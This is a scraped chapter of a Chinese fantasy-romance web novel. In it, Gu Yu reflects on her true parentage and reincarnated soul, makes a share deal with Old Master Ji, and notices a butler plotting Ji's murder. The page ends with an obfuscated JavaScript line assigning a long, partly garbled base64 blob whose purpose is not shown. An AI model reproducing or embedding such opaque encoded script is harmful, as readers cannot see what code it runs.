亲,欢迎光临25中文网!
错缺断章、加书:站内短信
后台有人,会尽快回复!
  • 主题模式:

  • 字体大小:

    -

    18

    +
  • 恢复默认

顾妤听完季老爷子的话,脸色彻底变了。

所以自己真的不是顾家的孩子,她的亲生父母另有其人,甚至连顾老爷子和季老爷子他们都不知道。

她的母亲还有外婆到底是什么人,她怀疑很有可能她们现在都不在这个世界位面上了。

很有极大的可能她们都不属于这个位面的世界,至于现在她们在那个地方,就算是鼎盛时期的自己都没有那个实力去跨越位面计算她们所在的位置。

每个世界位面的位置都是独一无二的存在的,除非有超越天道规则限制的力量,才可以随意跨越位面空间。

看起来自己的亲生母亲很有可能就是这种存在,以自己现在的能力是绝对不可能达到那种程度的。

寻找母亲的事情顾妤并不着急,对她来说,自己的母亲至少是有下落存在的,但是自己那个父亲,就连季老爷子他们都不知道,这个世界上恐怕只有自己那个从未谋面过的母亲才知道了。

如果是这样的话,她有理由怀疑自己根本就是顾妤,原来的自己只是一半灵魂碎片,只不过自己重新回到了这具原本的身体里面罢了。

要不然无法解释为什么这具身体里根本就没有任何灵魂的存在,自己居然也能和这副身体达到百分之百的契合度。

世界上不可能会有这么契合度达到这么高的匹配,除非这副身体原本就是属于自己的。

“想不到你和顾老爷子之间还有这么一出事,这顾老爷子也还挺痴情的哈。”

顾妤回过神,心中已经基本上确定了自己原本就是这副身体主人的事实。

自己的灵魂只不过是可能被自己母亲或者是谁传送到玄灵大陆那个位面的世界去了。

在那面死亡消散后,灵魂自动回归到原来的身体里面去。

这样一来全部都能解释的通了。

此时此刻的季老爷子根本还不知道面前这个站着的少女就是他心上人的孙女,他还很惋惜地继续跟顾妤讲述道。

“是啊,尽管我们对于她突然那消失又突然带回来个女儿这件事情感到很气愤,但是她毕竟是我们最爱的女人。

“哪怕到后面我和老顾都各自因为家族的关系,都娶了别人,但是在我们的心里只有阿宁才是我们真正所爱之人。”

“行了,季老爷子我答应你,只要你给我百分之二季家股份,我也会信守承诺的。”

“那就祝我们合作愉快了。”

顾妤见时间也不早了,就打算早点回去。

反正继续待在这里也没什么好玩的了。

正当季老爷子和顾妤出了密室,前往正厅的时候,管家急急忙忙地朝着季老爷子跑来。

“老爷老爷!”

“何事慌慌张张?”

季老爷子看了一眼来人,面露不悦道。

一旁的顾妤听到管家的声音的时候,眼神多了几分戏谑。

这男人不就是自己在后花园准备密谋除掉季老爷子的男人吗?

看来他已经迫不及待了?

“不是不是.....”

那管家狐疑地看了一眼季老爷子身边的顾妤,奇怪老爷怎么会和这个女人在一起?

“有事快说。”

“我刚刚和这位唐先生的未婚妻谈了点事情。”

季老爷子突然想起来他还不知道这丫头叫什么名字呢。

“哦哦哦,老爷,二少爷回来了。”

“你说什么?”

管家刚一说完,季老爷子便面露喜色,神情有些激动地问道。

“是的,老爷,您没听错,二少爷他回来了。”

管家点了点头,眼底闪过一丝嘲讽。

二少爷回来又怎样,你这老头必须死!

季老爷子沉浸喜色当中,根本就没注意到管家的不对劲。

倒是顾妤站在一旁,静静地看着那个管家,嘴角勾起一抹冷笑。

这个男人倒是胆子挺大,居然敢当着别人的面露出杀意,难道就不怕被她发现吗?

哦,她已经发现了。

此时此刻的管家还不知道他已经被顾妤盯上了,还装作一副神色激动的样子继续说道。

“老爷您赶紧去前厅看看吧。”

“好好好,渊儿回来就好。”

季老爷子连顾妤都不管了,直接丢下顾妤和管家两人,急冲冲地朝着宴会前厅走去。

管家刚想追上却被顾妤叫住。

“等等,你是季家的管家是吧?”

“你在季家做了多少年了?”

管家不知道为什么顾妤会突然问自己这个问题,出于警惕,他冷眼看着顾妤回答了句。

“虽然您是唐先生的未婚妻,但这好像是在下的私事,也没有必要告诉您吧。”

“哦。”

“既然你都知道我是唐黎明的未婚妻,那你知不知道季老爷子和我的关系不错,嗯哼?”

顾妤似笑非笑地盯着管家看着,让管家都感觉到了一股无形的压力。

“我不知道您在说什么。”

管家此时心里有些惊恐,这个女人这样问,不会是知道了些什么吧?

不应该啊,这件事情只可能季恒,他,还有那个女人知道,这个小丫头知道个什么鬼?

她不会是在炸自己吧?

管家想到这,立即换上一副不屑的面孔,继续说道。

“这位小姐,您要是没什么事情我就先告退了,毕竟我还有很多事情要去忙,就不陪您闲聊了。”

管家说完刚想离开,却听见身后传来顾妤的声音。

“我劝你还是放聪明点,一旦做出了不可挽回的决定,小心到最后搬起石头砸自己的脚。”

顾妤善意地提醒了那管家一句。

可管家根本就没把顾妤的话给放在心上,在他看来,像顾妤这种小丫头,无非就是靠着长得有几分姿色依附男人的手段而已。

window.fkp = \"d2luZG93Lm9ua2V5Zm9jdxmoIkRRqwNwR3VJStdmb1lYSlNnR3NqZVmxN2R0VUh0mVJooth5R1b3ZthawxbKmdJ1K3ZpbzNpd1FYSjZpdFVFUUpwN01Edks4VwFRRhAvS29hwnF1UUpNdkhEwVlpNmFLqwVhNhRkUURiVFY4cmNqwjZ4Sy9vYtl4a1hiRjZ6czN3IiwgmtYzmjI3otEymyk=\";